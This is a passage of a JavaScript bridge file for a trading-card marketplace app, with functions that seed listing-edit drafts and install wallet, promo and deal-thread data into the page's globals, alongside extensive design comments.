       refuse: saving a half-seeded draft would write freshWiz defaults over
       the seller's toggles, packaging and grading. */
    editId: editMoreReturn && editMoreReturn.id ? String(editMoreReturn.id) : null,
    editHadTradeFor: !!(editMoreReturn && editMoreReturn.hadTradeFor),
    editCollectionId: editMoreReturn && editMoreReturn.cid ? String(editMoreReturn.cid) : null,
    editKind: editMoreReturn && editMoreReturn.kind ? editMoreReturn.kind : null,
    editWasAvailable: !!(editMoreReturn && editMoreReturn.wasAvailable),
    editSeeded: !!(editMoreReturn && editMoreReturn.seeded),
    /* The listing's status as the server's record said it (the seed writes
       it); null for a collection piece or before the seed. Only active,
       unlisted and paused can be toggled; under review is saved as it is. */
    editStatus: editMoreReturn && editMoreReturn.status ? String(editMoreReturn.status) : null,
    /* The draft's own number (freshWiz): the publish module's "already
       published" latch is per draft, so one create does not block the next
       draft, and never an edit. */
    draftId: wiz.id ? String(wiz.id) : null,
    /* Whether the SERVER's record named a brand. An emptied brand is a
       withdrawal only when there was one to withdraw; a blank left blank sends
       nothing (the route's own rule: brand null with noBrand true, or neither). */
    editHadBrand: !!(editMoreReturn && editMoreReturn.serverBrand),
    /* The stored thumbnail of each stored photo, by its url, so a save sends
       the thumbnails back rather than the originals in their place. */
    editThumbs: editMoreReturn && editMoreReturn.thumbs ? editMoreReturn.thumbs : {},
  };
};

/* The edit in progress, for wizardEdit.ts: null when the wizard is not an
   edit. Read right after the door's click handler ran. */
window.__gbzEditContext = function () {
  if (!editMoreReturn) return null;
  return {
    id: editMoreReturn.id ? String(editMoreReturn.id) : null,
    cid: editMoreReturn.cid ? String(editMoreReturn.cid) : null,
    kind: editMoreReturn.kind || null,
    seeded: !!editMoreReturn.seeded,
    seq: typeof editMoreReturn.seq === "number" ? editMoreReturn.seq : null,
  };
};

/* The server's copy of the record, written into the draft the door opened.
   A field the record does not carry is left as the door seeded it (a page
   row knows the title and the toggles; only the server knows the packaging,
   the grade and the year). A field the seller has ALREADY CHANGED since the
   door (it no longer equals the door's own seed) is left alone too: the read
   is a fill, not a reset. A record for an edit that is no longer the current
   one (seq) is dropped. isAvailable is deliberately NOT written: the door
   opens open to offers (Blake 2026-09-18), and editWasAvailable carries the
   truth for the save. Marks the edit seeded and repaints. */
window.__gbzSeedWizardEdit = function (rec, seq) {
  if (!wiz || !editMoreReturn || !rec || typeof rec !== "object") return false;
  /* Fails CLOSED: an edit with a number takes only a record with that number. */
  if (typeof editMoreReturn.seq === "number" && seq !== editMoreReturn.seq) return false;
  var has = function (k) { return Object.prototype.hasOwnProperty.call(rec, k) && rec[k] !== undefined; };
  var door = editMoreReturn.doorDraft || null;
  var sameList = function (a, b) {
    if (!Array.isArray(a) || !Array.isArray(b) || a.length !== b.length) return false;
    for (var i = 0; i < a.length; i++) if (a[i] !== b[i]) return false;
    return true;
  };
  var untouched = function (k) {
    if (!door) return true;
    var a = wiz[k], b = door[k];
    if (Array.isArray(a) || Array.isArray(b)) return sameList(a, b);
    return a === b;
  };
  if (has("title") && untouched("title")) wiz.title = String(rec.title || "");
  if (has("description") && untouched("description")) wiz.description = String(rec.description || "");
  if (has("category") && untouched("cat")) wiz.cat = rec.category || null;
  if (has("subcategory") && untouched("sub")) wiz.sub = rec.subcategory || null;
  if (has("itemSize") && untouched("attr")) wiz.attr = rec.itemSize || null;
  if (has("brand")) {
    editMoreReturn.serverBrand = String(rec.brand || "");
    if (untouched("brand")) wiz.brand = String(rec.brand || "");
  }
  if (has("condition") && rec.condition && untouched("condition")) wiz.condition = String(rec.condition);
  if (has("value") && rec.value !== null && untouched("value")) wiz.value = String(rec.value);
  if (has("acceptsCash") && untouched("acceptsCash")) wiz.acceptsCash = !!rec.acceptsCash;
  if (has("acceptsItems") && untouched("acceptsItems")) wiz.acceptsItems = !!rec.acceptsItems;
  if (has("acceptsHybrid") && untouched("acceptsHybrid")) wiz.acceptsHybrid = !!rec.acceptsHybrid;
  if (has("images") && Array.isArray(rec.images) && rec.images.length && untouched("photos")) wiz.photos = rec.images.slice(0, 4);
  if (has("thumbs") && rec.thumbs && typeof rec.thumbs === "object") editMoreReturn.thumbs = rec.thumbs;
  /* Availability is the record's, never the page's guess: a hidden listing
     merged from a deep link carries no flag the door could read. */
  if (has("status")) {
    editMoreReturn.status = rec.status ? String(rec.status) : null;
    if (rec.status) editMoreReturn.wasAvailable = rec.status === "active";
    /* Under review the switch is the server's and locked ON (it goes live on
       approval); a flip made before the read landed is undone here. */
    if (rec.status === "under_review") wiz.isAvailable = true;
  }
  if (has("year") && untouched("year")) wiz.year = rec.year ? String(rec.year) : "";
  if (has("grader") && untouched("grader") && untouched("grade")) { wiz.grader = rec.grader || null; wiz.grade = has("grade") && rec.grade ? String(rec.grade) : null; }
  if (has("cert") && untouched("cert")) wiz.cert = String(rec.cert || "");
  if (has("weightLb") && untouched("weightLb") && untouched("weightOz")) {
    wiz.weightLb = rec.weightLb === null ? null : Number(rec.weightLb);
    if (has("weightOz")) wiz.weightOz = rec.weightOz === null ? null : Number(rec.weightOz);
  }
  if (has("dimL") && untouched("dimL")) wiz.dimL = String(rec.dimL || "");
  if (has("dimW") && untouched("dimW")) wiz.dimW = String(rec.dimW || "");
  if (has("dimH") && untouched("dimH")) wiz.dimH = String(rec.dimH || "");
  /* The item's Trade for (PR B, card 1218637972579066 item 4): the stored list, every entry
     picked, joins whatever the seller already added through the pop-up while the read was out.
     A fill, not a reset: an entry added before the read stays, an entry the seller had already
     turned off stays off when it is also stored. hadTradeFor records whether the read carried
     the column at all: a CLEARED list withdraws with null only then, so a read that one day
     dropped the field could not turn every edit into a silent wipe (the brand path guards the
     same way). It guards the cleared case only: a save with an entry picked still sends the
     list, and would replace a stored one the read never showed. Unreachable while both reads
     carry the column, as they do today. */
  editMoreReturn.hadTradeFor = has("tradeFor") && Array.isArray(rec.tradeFor);
  if (editMoreReturn.hadTradeFor) {
    var have = Array.isArray(wiz.tradeFor) ? wiz.tradeFor : [];
    var haveSel = wiz.tradeForSel instanceof Set ? wiz.tradeForSel : new Set();
    var merged = rec.tradeFor.slice(); var picked = new Set();
    for (var pi = 0; pi < merged.length; pi++) picked.add(pi);
    for (var hi = 0; hi < have.length; hi++) {
      /* The same entry in another letter case is the same entry (commitWantToItem keeps one). */
      var at = -1; var hv = String(have[hi]).toLowerCase();
      for (var mi = 0; mi < merged.length; mi++) { if (String(merged[mi]).toLowerCase() === hv) { at = mi; break; } }
      if (at < 0) { merged.push(have[hi]); if (haveSel.has(hi)) picked.add(merged.length - 1); }
      else if (!haveSel.has(hi)) picked.delete(at);
    }
    wiz.tradeFor = merged; wiz.tradeForSel = picked;
  }
  editMoreReturn.seeded = true;
  rerenderKeepScroll();
  return true;
};

/* After a real save: the page's own rows take the server's answer, the edit
   ends, and the seller is back where they pressed Edit. Object.assign keeps
   the row objects route() already handed out. */
window.__gbzApplyEdit = function (r) {
  if (!editMoreReturn) return false;
  var back = editMoreReturn;
  editMoreReturn = null;
  editModalFor = null;
  /* The listing's id, from the re-read row or from the save itself, so the
     tile and the page row still move when the re-read failed. */
  var lid = (r && r.listing && r.listing.id) || (r && r.id) || null;
  var hit = null;
  if (lid) for (var i = 0; i < LISTINGS.length; i++) if (LISTINGS[i].id === lid) { hit = LISTINGS[i]; break; }
  if (r && r.listing && r.listing.id) {
    if (hit) {
      /* The page's own live state rides over the save: the thread, its count
         and Looking For are not on the single-listing read, and a save must
         not empty them until the next page load. */
      var keep = { comments: hit.comments, commentCount: hit.commentCount, lookingFor: hit.lookingFor };
      Object.assign(hit, r.listing);
      if ((!r.listing.comments || !r.listing.comments.length) && keep.comments) hit.comments = keep.comments;
      if (!r.listing.commentCount && keep.commentCount) hit.commentCount = keep.commentCount;
      if ((!r.listing.lookingFor || !r.listing.lookingFor.length) && keep.lookingFor) hit.lookingFor = keep.lookingFor;
    } else if (r.available === true) {
      /* A row the page never held joins the floor only when it is LIVE: an
         under-review listing pushed here would render as a live card. */
      hit = r.listing; LISTINGS.push(r.listing);
    }
  }
  /* Off the floor as a collection piece, or back on it: data.js's own "not
     for sale" state, which every card and the detail page already follow.
     Left alone when availability is not known (a listing under review). */
  if (hit && r && typeof r.available === "boolean") hit.collectionOnly = !r.available;
  if (lid) for (var j = 0; j < MY_COLLECTION.length; j++) {
    var row = MY_COLLECTION[j];
    if (row.lid !== lid) continue;
    var src = (r && r.listing) || hit || (r && r.accepts) || null;
    if (r && r.listing) { row.title = r.listing.title; row.image = r.listing.image; row.value = r.listing.declaredValue; }
    if (typeof r.available === "boolean") row.status = r.available ? "ACTIVE" : "IN COLLECTION";
    /* A save that put the listing in review (the high-value hold), or one on a
       listing still in review: the tile wears the word (card 1219177682942591). */
    else if (r.inReview === true) row.status = "IN REVIEW";
    if (src) row.chips = row.status === "ACTIVE" || row.status === "PENDING" || row.status === "IN REVIEW"
      ? [src.acceptsCash && "SALE", src.acceptsItems && "TRADE", src.acceptsHybrid && "HYBRID"].filter(function (c) { return typeof c === "string"; })
      : [];
  }
  if (r && r.item && r.item.id) {
    var found = null;
    for (var k = 0; k < MY_COLLECTION.length; k++) if (MY_COLLECTION[k].id === r.item.id) { found = MY_COLLECTION[k]; break; }
    if (found) Object.assign(found, r.item); else MY_COLLECTION.unshift(r.item);
    /* The same piece may be on the floor wearing a listing's shape ("coll-"
       plus its id): its card and page follow the save too. */
    for (var c = 0; c < LISTINGS.length; c++) {
      var shown = LISTINGS[c];
      if (shown.id !== "coll-" + r.item.id) continue;
      shown.title = r.item.title; shown.image = r.item.image; shown.declaredValue = r.item.value;
      if (typeof r.item.note === "string") shown.description = r.item.note;
    }
  }
  /* The saved draft is not a draft any more: kept, it came back through the
     tab bar's + List as a CREATE of the item just saved. */
  wiz = null;
  if (back.hash && back.hash !== currentHash()) location.hash = back.hash; else render();
  return true;
};

/* The submitted sheet (walk #12, Blake 2026-10-01). wizardPublish.ts calls the
   first only after the create came back 201, and the second only when the row
   really went active; app.js refuses "Live" at or over $10,000 either way.
   Each reads false when the page could not take it (the seller left the form,
   or the sheet is for another draft), and the publish module then says its
   sentence instead. */
window.__gbzShowPublished = function (item) { return openPublishedSheet(item); };
window.__gbzPublishedLive = function (draftId) { return publishedSheetLive(draftId); };

/* The edit ends with nothing saved (a listing the server has locked), and the
   seller is back where they pressed Edit. */
window.__gbzCancelEdit = function () {
  if (!editMoreReturn) return false;
  var back = editMoreReturn;
  editMoreReturn = null;
  editModalFor = null;
  wiz = null;
  if (back.hash && back.hash !== currentHash()) location.hash = back.hash; else render();
  return true;
};

window.__gbzWizardDraft = function () {
  if (!wiz) return null;
  /* Confirmed values here too. This one feeds the price check, so a raw read
     would run a comp lookup against a number the seller has not accepted —
     and then show them an answer about it. Blanked, the check simply has no
     price to check, which is its ordinary pre-typed state. */
  var cfd = wizConfirmed(wiz);
  return {
    title: String(cfd.title || ""),
    description: String(wiz.description || ""),
    category: wiz.cat || null,
    declaredValue: parseInt(cfd.value, 10) || 0,
    condition: cfd.condition || null,
    brand: String(cfd.brand || ""),
    /* THE SLAB'S GRADE, FOR THE PRICE CHECK ONLY. The server's comp search never
       saw the grade, so a PSA 10 whose title does not say so was priced as the raw
       card (card 1219063291906242). wiz.grader is "Raw" or null for an
       ungraded draft, and a grader with no grade picked yet is not a graded card
       either, so all three are sent only when BOTH halves are there; otherwise
       the draft says nothing about grading, exactly as it did before. Read raw
       rather than through wizConfirmed: the scan does not fill these two, so there
       is no unconfirmed value to blank. The grade is a string in app.js ("10",
       "9.5"); the server wants a number. */
    graded: !!(wiz.grader && wiz.grader !== "Raw" && wiz.grade),
    grader: wiz.grader && wiz.grader !== "Raw" && wiz.grade ? String(wiz.grader) : null,
    grade: wiz.grader && wiz.grader !== "Raw" && wiz.grade ? parseFloat(wiz.grade) : null,
  };
};

/* The in-flight half, and ONLY the in-flight half.

   'running' paints Blake's own "Checking the floor and recent comps…" copy
   (app.js:1626) — true while a real POST is outstanding. Clearing returns his
   pre-run panel with the run button, the honest resting state when no answer
   exists.

   🔴 THERE IS DELIBERATELY NO SETTER FOR "done". wzPcState === "done" is the
   single line that renders app.js:1613-1624's fabrication: min/max computed as
   round(v * 0.85)/round(v * 1.15) from the seller's OWN typed number, badged
   HIGH CONFIDENCE, verdict PRICED FAIR, over the sentence "Comparable pieces
   cleared between $X and $Y in the last 90 days. Your number sits right in the
   pocket." There are no comparable pieces; there is one number, multiplied
   twice. A real answer is rendered by the wrapper in installWizardPriceCheck
   instead, and this flag never reaches "done" — the same rule
   __gbzSetListingPriceCheck states for pcRun, for the same reason. */
window.__gbzSetWizardPriceCheckRunning = function (running) {
  wzPcState = running ? "running" : null;
};

/* installWallet's target. WALLET is a data.js top-level const, so its FIELDS
   are assigned in place and the binding itself is never replaced — the same
   reason __gbzInstallFloor mutates rather than reassigns.

   Two writes, not one, because Blake's wallet screen reads from TWO places:
   WALLET for the money, and USERS[store.me] for the four gamification fields
   (lvl / pts / ptsNext / streak) that renderWallet and renderRepDash
   dereference without a guard.

   🔑 REPAINTS ON #/profile TOO (2026-08-27, review of card 1217901376680748 —
   the profile chip now reads tierOfLvl(u.lvl).name, the SAME field
   renderRepDash's own gem tier already reads on the SAME page). Before this,
   a cold load landing directly on #/profile painted whatever u.lvl held
   BEFORE this fetch resolves — 1 if the visitor is also a floor seller
   (mapSellerToUser's explicit 'Level 1, not 0' default, see its own
   comment) or undefined if they are not yet a USERS entry at all (in which
   case renderProfile's own 'if (!u) return "";' guard means nothing painted
   regardless). tierOfLvl(1) genuinely falls in the EMERALD band, and
   tierOfLvl(undefined) falls through to '|| TIERS[0]' (data.js) to the
   SAME EMERALD default rather than crashing or printing "undefined" —
   Blake's own fallback, not a new guard this file adds — so the honest
   cold-load default is a real (if transient) tier name, never a broken
   chip. This just makes sure the REAL level replaces it without the
   visitor having to navigate away and back, the same reason #/wallet was
   already covered.

   Repaints only when the visitor is on #/wallet OR #/profile, and only
   through window.render — app.js's own top-level function declaration, the
   same re-callable global installLiveListingComments uses. A fetch that
   resolves after they navigated away must not clobber the view they are
   looking at now. */
window.__gbzInstallWallet = function (wallet, meFields) {
  for (var wk in wallet) WALLET[wk] = wallet[wk];

  var me = store.me;
  if (me && USERS[me]) {
    for (var gk in meFields) USERS[me][gk] = meFields[gk];
  }

  var wh = window.location.hash;
  if ((wh === "#/wallet" || wh === "#/profile") && typeof window.render === "function") {
    window.render();
  }
};

/* THE PROMO BRIDGE (List & Earn, Asana 1218034213981009).

   Same shape as the wallet bridge above and for the same reason: PROMO is a
   top-level binding in app.js, so an ES module cannot reach it by name — only
   a classic script sharing app.js's scope can.

   🔴 source:"api" IS SET HERE, LAST, AND ONLY HERE. It is the render gate for
   all four promo surfaces (app.js promoInstalled()). Setting it is what turns
   the promotion on, so it happens after the fields land, never before — a
   half-copied PROMO behind an open gate is the "promotion with holes" the
   server's own 500 comment refuses to allow.

   Repaints only the three routes that read PROMO — the profile chip, the two
   wallet rows, and the promotion page — so a fetch resolving after the visitor
   navigated away cannot clobber the view they are looking at now. */
window.__gbzInstallPromo = function (promo, ladder) {
  /* The ladder rides along because promoTier() indexes PROMO_LADDER, not the
     payload — leaving the seeded copy in place would let ops change the rungs
     and have the UI keep quoting the old ones. Mutated in place: it is a const
     binding, so it can be emptied and refilled but never reassigned.

     🔴 REPLACED WHOLESALE, WITH NO FALLBACK TO THE SEEDED RUNGS. An earlier
     draft kept the seeded four whenever the payload's ladder was empty, which
     reads as defensive and is the opposite: it makes the page quote amounts the
     server never sent. promoInstall.ts's usable() is the gate that keeps a
     short ladder from ever reaching here (app.js:3108 indexes rung [1] with no
     guard), so this stays deliberately dumb — if that gate is ever loosened,
     the page breaks visibly instead of lying quietly. */
  PROMO_LADDER.length = 0;
  for (var li = 0; li < (ladder || []).length; li++) PROMO_LADDER.push(ladder[li]);
  for (var pk in promo) PROMO[pk] = promo[pk];
  PROMO.source = "api";

  /* Repaint only the routes that read PROMO, so a fetch resolving after the
     visitor navigated away cannot clobber the view they are looking at now.

     🪤 ASKS THE ROUTER, NOT THE HASH. A literal hash list missed "#/u/<own
     handle>", which route() also resolves to {view:"profile"} — the same
     renderProfile that carries the promo chip — so the chip stayed absent until
     something else repainted. Matching on the resolved view cannot drift the
     way a hand-kept list of strings does. Found in review. */
  var pv = typeof route === "function" ? (route() || {}).view : "";
  if (
    (pv === "promotion" || pv === "wallet" || pv === "profile") &&
    typeof window.render === "function"
  ) {
    window.render();
  }
};

/* ── THE GUEST SHEET'S CAMPAIGN GATE (card 1218342457183573, item ②) ───────

   app.js's guest interstitial advertises a money offer to someone with no
   account. Whether that offer can still be TAKEN is server state, and app.js
   cannot go and ask: Blake's bundle makes ZERO network calls, and that is not
   a convention but a pinned guard — demoWriteGuardDerivation.test.ts asserts
   his two files contain no fetch(, XMLHttpRequest, sendBeacon, EventSource,
   WebSocket or .ajax(, with four positive controls so the six zeroes cannot
   be six broken greps. So the read lives in promoOpenGate.ts and the answer
   arrives here, which is the same division every other __gbz* bridge uses.

   🔴 ONE-WAY, AND THAT IS THE DESIGN. app.js declares promoCampaignOpen
   false and this is the only thing that can ever set it true. Anything that
   is not an explicit 200 {"open":true} — a 429 from the shared egress-IP
   bucket, a 500 from the quota breaker, a body of the wrong shape, or the
   queued-command hang that never answers at all — simply never reaches this
   line, and the sheet stays dark because it never left that state. There is
   deliberately no setter for false: a two-way flag would need every caller to
   be right about the negative case, and this needs them to be right about
   nothing.

   REPAINTS ONLY IF THE SHEET WOULD NOW SHOW, the same rule __gbzInstallPromo
   states one function above: this read resolves after app.js has already
   painted, and a guest who has navigated on in the meantime must not have
   their view clobbered by an answer to a question they have left behind.
   promoSheetShouldShow() already carries all four conditions (guest, home,
   unanswered, and now open), so asking it is exactly the right test.

   Reads 'render' lexically rather than through window, unlike the repaint in
   __gbzInstallPromo. Both work in a browser — a classic script's top-level
   function declaration is both — but only the lexical name also resolves
   inside the suites' single-scope loadDemo(), so the repaint is testable
   rather than silently skipped there. */
window.__gbzPromoSheetOpen = function () {
  promoCampaignOpen = true;
  if (
    typeof promoSheetShouldShow === "function" &&
    promoSheetShouldShow() &&
    typeof render === "function"
  ) {
    render();
  }
};

/* The three wallet facts Blake's own renderer has no socket for, read BACK off
   WALLET rather than cached alongside it — the same rule __gbzThreadOfferId
   states, because two copies of one fact are how the two drift. His click
   handlers mutate WALLET in place (WALLET.spendable += 50, WALLET.coupons.push
   (...)), so the live object is the only thing that is still true after one.

   Consumed by walletFixups.ts, which is an ES module and therefore cannot
   reach WALLET by name — the same constraint that makes this whole bridge a
   string, and the same shape __gbzListingPriceCheck already uses.

   🔑 'installed' IS STATED, NEVER INFERRED. A fixup has to tell "no wallet
   fetch has landed yet" from "it landed and the answer is zero", and the two
   are indistinguishable from the values alone — every one of them is 0/false
   at boot, because __gbzInstallFloor writes a fully-shaped zeroed WALLET. So
   the flag is carried rather than guessed. It is derived from the ABSENCE of
   pendingEscrowTotal, which the boot zeroing deliberately does not set:
   mapWallet is its only writer, and Blake's renderer never reads it, so
   absence is unambiguous here in a way it is not for the other three.

   payoutsLoaded false while installed is TRUE is the real signal — the wallet
   answered and GET /api/stripe/payouts did not. */
window.__gbzWalletFacts = function () {
  return {
    installed: typeof WALLET.pendingEscrowTotal === "number",
    pendingEscrowTotal: typeof WALLET.pendingEscrowTotal === "number" ? WALLET.pendingEscrowTotal : 0,
    payoutsLoaded: WALLET.payoutsLoaded === true,
    promoCreditBalance: WALLET.promoCredit ? WALLET.promoCredit.balance : 0,
  };
};

/* installDeals' target. THREADS is a data.js top-level const, so rows are
   pushed in place rather than the binding replaced.

   TWO writes again, and the second is the load-bearing one: renderThread reads
   USERS[t.with].level and .trades with NO guard (app.js:1855), and USERS only
   ever held sellers from the listings feed. A counterpart with no live listing
   is absent from it, and the deals view throws on its first render. Merged
   rather than assigned, so a counterpart who IS a real seller keeps the richer
   row the listings feed already built for them.

   dealsSel is deliberately not touched: __gbzInstallFloor already nulled it at
   boot, and Blake's own selector degrades gracefully on a stale id
   ('list.find(...) || list[0]').

   🔑 ALSO REPAINTS ON THE SIGNED-IN HOME, added 2026-08-27 (F3, initial-paint
   timing): the floor strip (renderFloorCards, inside renderWelcome) reads
   THREADS synchronously off the SAME first render() that painted before this
   fetch resolved, so without this the strip stays empty until the visitor
   causes some other render. 'h === "#/" || h === ""' mirrors currentHash()'s
   own default (app.js currentHash() is 'location.hash || "#/"') without
   calling it — this bridge runs before app.js has necessarily finished
   defining it the first time bridgeScriptSource evaluates, so it reads
   window.location.hash raw, the same way this function already does one line
   above for the #/deals check. Gated on store.authed too: a guest's "#/"
   never renders the strip at all (route() only takes the store.authed branch
   home), so repainting for a signed-out visitor would be a no-op at best.
   Calling window.render() (not rerenderKeepScroll) while the hash has not
   changed sets its own 'navigated' flag false — app.js's '_lastHash' was
   already "#/" from the FIRST paint — so the trailing 'if (navigated)
   window.scrollTo(...)' is skipped and a scrolled visitor keeps their
   position; render() is used only because it is the same call this function
   already makes for #/deals/#/inbox, not a new mechanism. No other view is
   touched — the transport's own clobber rule (see the wallet installer
   above): a fetch that resolves after the visitor navigated away must not
   repaint the page they are looking at now.

   ALSO REPAINTS ON #/profile (card 1219445172526734, decision D5, 2026-10-20),
   the one view added since: your collection's tiles show View Order, View Sale
   and View Trade only when the piece's deal is in THREADS (app.js
   dealForPiece), so a #/profile painted before this list landed showed none
   of them until some other render. The wallet installer above repaints
   #/profile the same way. __gbzRefreshDeals below is deliberately not widened
   to #/profile here: it is PR 1080's region. A refresh can still land while
   #/profile is on screen (the message rail's first message, dealMessaging.ts,
   which repaints the page itself right after it; an in-person completion,
   inPerson.ts). */
window.__gbzInstallDeals = function (threads, users) {
  THREADS.length = 0;
  for (var ti = 0; ti < threads.length; ti++) THREADS.push(threads[ti]);
  /* 🔑 Each person's Deals-order key is kept from this list read on, not only
     from a Deals paint (app.js dealsRememberKeys: a key never goes down during a
     visit). The website's own counter, sent from the message rail on another
     page, takes an offer off the wire before the Deals list ever painted its
     sender. app.js evaluates after this script, and that function reads its
     tourFix (a let): typeof plus try/catch, the msgRailFor pattern below. */
  try {
    if (typeof dealsRememberKeys === "function") dealsRememberKeys();
  } catch (ke) {}

  for (var uh in users) {
    if (!USERS[uh]) USERS[uh] = users[uh];
  }

  var h = window.location.hash;
  var onHome = h === "#/" || h === "";
  if ((h === "#/deals" || h === "#/inbox" || h === "#/profile" || (onHome && store.authed)) && typeof window.render === "function") {
    /* Keep the visitor's place: this lands on its own, a moment after the page
       loads, and a plain render() sent a rail they had already swiped back to
       its first card (2026-09-21). */
    if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll(); else window.render();
  }
};

/* THE MERGE-IN-PLACE REFRESH — for a write that just changed the server's mind
   about a deal, where __gbzInstallDeals above would be the wrong tool.

   🔴 IT CLOBBERS, AND AFTER AN OFFER ACTION THAT IS DESTRUCTIVE. It empties
   THREADS and pushes a freshly mapped set, which is exactly right at boot and
   exactly wrong afterwards: the lazily-fetched half of every OPENED thread —
   msgs, history, tracking, the fee block, and the __gbzOfferId every offer
   action resolves through — lives only on those row objects, and
   installDealThreadLoader's one-attempt cache never fetches any of it a second
   time. Reinstalling would blank the open thread's messages and leave every
   other thread the visitor had opened permanently empty, with no way back
   short of a reload.

   So: the same row objects, updated in place, in the server's new order. The
   reference renderDeals is holding stays valid, the same reason
   __gbzInstallDealThread merges rather than replaces.

   🔑 A DENYLIST, NOT AN ALLOWLIST, and that is the load-bearing choice. Every
   own field the fresh row carries is copied over EXCEPT the four the detail
   passes own, so a field mapDealThread grows tomorrow is carried here without
   anyone remembering to update this function — the alternative, naming the
   list-owned fields, is a second place that has to learn every change and the
   exact shape that drifts. The four skipped are precisely what
   __gbzInstallDealThread and __gbzInstallThreadFees write. __gbzOfferId and
   'disputed' need no entry: the mapper never emits them, so the copy loop
   cannot see them and they ride through untouched.

   The dispute overlay is RE-APPLIED rather than merely preserved, one-way, the
   same four assignments as the detail pass and for the same reason: the list
   route knows nothing about disputes, so a refreshed row would otherwise drop
   back to a gold PAY cta on a deal that is in review.

   Repaint condition copied from __gbzInstallDeals deliberately — two functions
   that both write THREADS must not disagree about when the screen is stale.

   🔑 SCOPED TO ONE PERSON WHEN ASKED (onlyUserId: the open-thread poll's list
   read, and a one-shot thread read behind a stale list; floorTransport
   installListThenEvents). Those read the list because that person's offers
   moved on the server, and nobody chose to read the list then: with an id, only
   that person's rows are touched (merged as above; the rows that persist keep
   their order and their place, so the id both surfaces derive from their first
   row stands; rows this read brings follow them; a row the read no longer
   carries leaves), and every other row keeps its object, its fields and its
   place, so another person's newer line in that answer cannot move them up,
   slide a computer's unselected pane onto them or paint their dot (the read
   state's rule, PR 1078/1080: a list read must not slide the pane to another
   person or mark them read). The scoped person's OWN rows may move up, as any
   list read moves whoever sent something new (dealsRememberKeys): with the rail
   open on them over Deals and nothing selected, the pane under the rail can
   become theirs, which is where a closed rail leaves the visitor anyway. USERS
   gains that person only. The person is read off each row's id (p:<id> or
   d:<id>:<listing>), never the handle, which a username change would move.
   The re-home, the chat carry and the tab-follow below run unchanged: they are
   already about the selected row and the rows that left. Without an id,
   everyone, as before (every action's re-read). */
window.__gbzRefreshDeals = function (threads, users, onlyUserId) {
  var scope = typeof onlyUserId === "string" && onlyUserId ? onlyUserId : null;
  /* The counterpart a row's id names, or null for a row of another shape (the
     demo's, the tour's), which no scope ever matches. */
  function rowPerson(row) {
    var rp = typeof row.id === "string" ? row.id.split(":") : [];
    return (rp[0] === "p" || rp[0] === "d") && rp[1] ? rp[1] : null;
  }
  var prevById = {};
  for (var pi = 0; pi < THREADS.length; pi++) prevById[THREADS[pi].id] = THREADS[pi];
  /* The selected deal's tab BEFORE this read, for the tab-follow below: the merge
     rewrites each row's tab in place, on the same object. */
  var selTabBefore = dealsSel && prevById[dealsSel] ? prevById[dealsSel].tab : null;

  /* One fresh row over the row already installed, in place; a row that was not
     there is the fresh one itself. */
  function mergeRow(fresh) {
    var prev = prevById[fresh.id];
    if (!prev) return fresh;
    for (var k in fresh) {
      if (!Object.prototype.hasOwnProperty.call(fresh, k)) continue;
      if (k === "msgs" || k === "history" || k === "tracking" || k === "fees") continue;
      prev[k] = fresh[k];
    }
    if (prev.disputed) {
      prev.state = "DISPUTE OPEN";
      prev.act = false;
      prev.cta = null;
    }
    return prev;
  }

  var merged = [];
  if (!scope) {
    for (var fi = 0; fi < threads.length; fi++) merged.push(mergeRow(threads[fi]));
  } else {
    var freshById = {};
    for (var bi = 0; bi < threads.length; bi++) {
      if (rowPerson(threads[bi]) === scope) freshById[threads[bi].id] = threads[bi];
    }
    /* Their block: the rows that persist, in their standing order, then the
       rows this read brings, in the read's order. */
    var block = [];
    for (var si2 = 0; si2 < THREADS.length; si2++) {
      var standing = THREADS[si2];
      if (rowPerson(standing) !== scope || !freshById[standing.id]) continue;
      block.push(mergeRow(freshById[standing.id]));
      delete freshById[standing.id];
    }
    for (var bj = 0; bj < threads.length; bj++) {
      if (freshById[threads[bj].id]) block.push(mergeRow(threads[bj]));
    }
    var placed = false;
    for (var oi = 0; oi < THREADS.length; oi++) {
      if (rowPerson(THREADS[oi]) !== scope) { merged.push(THREADS[oi]); continue; }
      if (placed) continue;
      for (var bk = 0; bk < block.length; bk++) merged.push(block[bk]);
      placed = true;
    }
    if (!placed) for (var bl = 0; bl < block.length; bl++) merged.push(block[bl]);
  }

  THREADS.length = 0;
  for (var mi = 0; mi < merged.length; mi++) THREADS.push(merged[mi]);
  /* The key memory of __gbzInstallDeals above, from this read: a key this read
     brings is kept before the next one can take it off the wire. */
  try {
    if (typeof dealsRememberKeys === "function") dealsRememberKeys();
  } catch (rke) {}

  for (var ruh in users) {
    if (scope && !(users[ruh] && users[ruh].id === scope)) continue;
    if (!USERS[ruh]) USERS[ruh] = users[ruh];
  }

  /* A SELECTED ROW THAT VANISHED FROM THIS READ IS RE-HOMED TO ITS PERSON (card
     1219285769469932). A person the visitor has only messaged has one row keyed
     by the server's p:<id> (mapDealThread keeps row.key when there are no
     deals); their first deal turns their rows into d:<id>:<listing> keys, so a
     selected p: id is gone from the read. The path: message someone, then make
     them an offer (the Exchange and the listing page's Make Offer both read the
     list again). renderDeals then fell back to the tab's first person. So when
     dealsSel names no row here and the same counterpart (the id in p:<id> or
     d:<id>:<listing>, matched as __gbzThreadIdForUser matches it) has rows,
     dealsSel becomes their newest by personThreads' own rule for the row's id
     (app.js: the latest by offerAt, the first on a tie), so the highlighted row
     and the selection agree: their newest ON THE PAINTED TAB when it is not All
     and they have a row there (personThreads runs on the tab's rows, so that is
     the row the list names, and the tab is not moved for an unrelated newer deal,
     Amendment 5), else their newest overall. selTabBefore is the vanished row's
     tab, so the tab-follow below takes the selection to that row's tab only
     when nothing of theirs is left on the painted one. A selection whose person
     has no rows left keeps renderDeals' fallback. */
  var selFound = false;
  for (var vi = 0; vi < THREADS.length; vi++) {
    if (THREADS[vi].id === dealsSel) { selFound = true; break; }
  }
  var selParts = dealsSel ? String(dealsSel).split(":") : [];
  var selWho = (selParts[0] === "p" || selParts[0] === "d") && selParts[1] ? selParts[1] : null;
  if (!selFound && selWho) {
    var gone = prevById[dealsSel] || null;
    var newest = null;
    var newestOnTab = null;
    var sameWho = [];
    for (var ni = 0; ni < THREADS.length; ni++) {
      var nid = THREADS[ni].id;
      if (typeof nid !== "string" || (nid !== "p:" + selWho && nid.indexOf("d:" + selWho + ":") !== 0)) continue;
      sameWho.push(THREADS[ni]);
      if (!newest || (THREADS[ni].offerAt || "") > (newest.offerAt || "")) newest = THREADS[ni];
      if (dealsTab !== "all" && THREADS[ni].tab === dealsTab && (!newestOnTab || (THREADS[ni].offerAt || "") > (newestOnTab.offerAt || ""))) newestOnTab = THREADS[ni];
    }
